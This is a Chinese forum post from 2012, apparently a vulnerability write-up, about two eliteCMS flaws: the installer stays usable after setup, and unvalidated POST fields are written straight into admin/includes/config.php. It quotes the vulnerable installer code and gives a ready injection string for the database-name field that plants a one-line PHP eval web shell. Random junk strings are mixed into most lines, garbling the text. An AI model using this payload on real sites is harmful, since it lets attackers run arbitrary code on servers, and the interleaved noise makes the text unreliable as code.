eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
1 g" y7 k/ H) r0 [
9 H! F" ~+ ]: c# c) h另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
9 t+ M' {7 u$ Y9 G我们来看代码:; a; |; J2 n" N- |6 @' Z! x
) N' k! a* T: w* L" H. n& @& i...) h. c/ ?" f% |. { H( T& Z
elseif ($_GET['step'] == "4") {. d. x; c7 W U, c
$file = "../admin/includes/config.php";8 C! D" S" r! j+ _$ b7 F
$write = "<?php\n";" j- q+ Y1 ~! ?
$write .= "/**\n";1 G% Z/ A& b" y8 N. J v6 ]
$write .= "*\n";; g/ }" q/ R9 V
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
; t( {% I5 Y2 N, j8 j...略...: P" \. V& j; F: s4 q7 _# O( y2 X2 g
$write .= "*\n";
: i9 M4 N0 _" R! u, j& t $write .= "*/\n";
- @3 Z9 h# B1 s9 B $write .= "\n";
: T s! f& r7 D# m- T) Q- A& [ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 X; {! X$ v6 t/ ?: a $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; f2 G' L o! [" u n% C
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
9 _2 J0 R! ^7 c( G% p# I' `2 o $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
" u. Z9 O% `9 E! U" l5 x. v# ] $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";7 t% D" A& t: d i/ K+ E! d6 o1 i
$write .= "if (!\$connection) {\n";2 i! F$ h( n7 `7 d+ f
$write .= " die(\"Database connection failed\" .mysql_error());\n";
1 g- t% L" ~% k $write .= " \n";
0 Z! p7 f+ d2 P, J $write .= "} \n";
) z2 \" V7 S6 a6 t; _4 d) Q) z $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";, R V4 U7 `8 q7 C
$write .= "if (!\$db_select) {\n";( i t7 ^/ Q8 q# Y, v
$write .= " die(\"Database select failed\" .mysql_error());\n";7 M8 \" @" M' _5 e5 N0 w. d
$write .= " \n";5 Q4 E o, D0 T0 [& V
$write .= "} \n";
( C: Z8 Y5 y' p G( }; } d( H $write .= "?>\n";
) Z/ h4 g: `0 l5 n$ H5 Q$ x8 p% s1 f
1 D$ s2 v2 I% N$ M2 N0 a' A3 a( ~ $writer = fopen($file, 'w');
+ S! _ b7 X4 Y% ^! t% x...# w6 p1 Q! s: Q6 t C
, v5 |: C! u+ L- m
在看代码:
) m1 z3 E2 A/ @+ m1 ] h& X" m0 i3 w , q- v6 h! I N! c @% `& u2 s
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];) S$ ^5 I M- K g1 @. G
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
& f% R1 j, p1 a9 u/ ~9 o1 q" c) |$_SESSION['DB_USER'] = $_POST['DB_USER'];
6 R- ?" |. U" S5 J$_SESSION['DB_PASS'] = $_POST['DB_PASS'];" z+ X# X: j9 |* W3 S
1 i, V. q# d/ s- F
取值未作任何验证: ]& ]2 {! m- Z' S
如果将数据库名POST数据:
h# Q0 O) d/ K+ B* H. e7 n
9 l& K( ?# r w: G) o& ]"?><?php eval($_POST[c]);?><?php
0 N7 }. B2 j* f
4 J/ w7 c2 e5 r9 l将导致一句话后门写入/admin/includes/config.php
/ k* y3 E& Z. W: T |
发表于 2012-11-18 13:59:27
收藏
支持
反对